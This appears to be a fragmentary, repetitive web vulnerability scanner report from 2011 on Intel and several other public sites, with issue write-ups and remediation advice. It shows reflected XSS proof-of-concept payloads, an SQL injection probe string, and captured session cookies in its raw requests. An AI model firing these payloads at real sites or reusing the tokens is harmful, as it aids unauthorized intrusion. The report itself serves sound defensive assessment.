HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://newsroom.intel.com/index.jspa?iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755 Content-Length: 69 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:33 GMT Connection: close Set-Cookie: ASPSESSIONIDCSRQSQAR=CDELKMPAGGGMGBKHKJPMODBH; path=/
4.99. http://www.intel.com/pressroom/index.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.intel.com
Path:
/pressroom/index.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cfeb6<script>alert(1)</script>8732c9cbc96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pressroom/index.htm?cfeb6<script>alert(1)</script>8732c9cbc96=1 HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Location: http://newsroom.intel.com/index.jspa?cfeb6<script>alert(1)</script>8732c9cbc96=1 Content-Length: 43 Content-Type: text/html Vary: Accept-Encoding Expires: Sat, 05 Feb 2011 23:20:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:20:33 GMT Connection: close Set-Cookie: ASPSESSIONIDCSQQQQAT=CNNMGNPABDJEOBDKJLPLFJNJ; path=/
cfeb6<script>alert(1)</script>8732c9cbc96=1
5. Flash cross-domain policypreviousnext There are 4 instances of this issue:
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: i.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: gdata.youtube.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 Connection: close Content-Length: 1581
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.intel.com
Response
HTTP/1.0 200 OK Content-Length: 290 Content-Type: text/xml Last-Modified: Tue, 10 Jan 2006 16:04:48 GMT Accept-Ranges: bytes ETag: "78bab694ff15c61:4299" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Date: Sat, 05 Feb 2011 23:13:36 GMT Connection: close
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://digg.com/submit?url=
The form contains the following password field:
password
Request
GET /submit?url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.ericmmartin.com/wordpress/wp-login.php
The form contains the following password field:
pwd
Request
GET /projects/simplemodal/ HTTP/1.1 Host: www.ericmmartin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:13 GMT Server: Apache X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 05 Feb 2011 20:00:09 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 33772
The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.
You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.
Issue remediation
The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.
Request
GET /Search/newsearch.php3?Category=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&Go=Go!&S_S=3 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.freedownloadscenter.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
Request
GET /cs_login HTTP/1.1 Host: secure-newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /references/index.htm HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36568
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Reference Room: Intel Business Success Stories</title> ...[SNIP]... <li><a href="http://communities.intel.com/community/vproexpert;jsessionid=152C4B2202F8C74B9C1A846300448669">Intel. vPro. Expert Center</a> ...[SNIP]... <li><a href="http://communities.intel.com/community/server;jsessionid=152C4B2202F8C74B9C1A846300448669">The Server Room</a> ...[SNIP]...
10. Password field submitted using GET methodpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://digg.com
Path:
/submit
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:
http://digg.com/submit?url=
The form contains the following password field:
password
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET /submit?url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/openportit/server HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/openportit/vproexpert HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/tech HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/tech/desktop HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.jspa HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* RESET STYLES (see http://meyerweb.com/eric/tools/css/reset/) */ /* * * this is not a straight copy/paste from the above URL. this has been * custom modified by us. so don't go copy/paste u ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* overrides for elements while customizing a page */ body.jive-body-widget-customizing #jive-body #jive-body-intro, body.jive-body-widget-customizing #jive-body #jive-breadcrumb, body.jive-body-wi ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: newsroom.intel.com
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 01:56:20 GMT Server: Apache Set-Cookie: JSESSIONID=0F9AA48CBC22DD7A7D0A421E6737E14C.node7IPR; Domain=.intel.com; Path=/ Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/ X-JAL: 17 Content-Language: en-US CacheHit: D=26624 t=1296957380484009 X-JSL: D=26628 t=1296957380484009 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cs_login HTTP/1.1 Host: secure-newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en-us X-Pingback: http://software.intel.com/en-us/services/comment/pingback/ Date: Sat, 05 Feb 2011 23:21:40 GMT Content-Length: 20519 Connection: close Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com Set-Cookie: loginpt=0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <head profile="http: ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
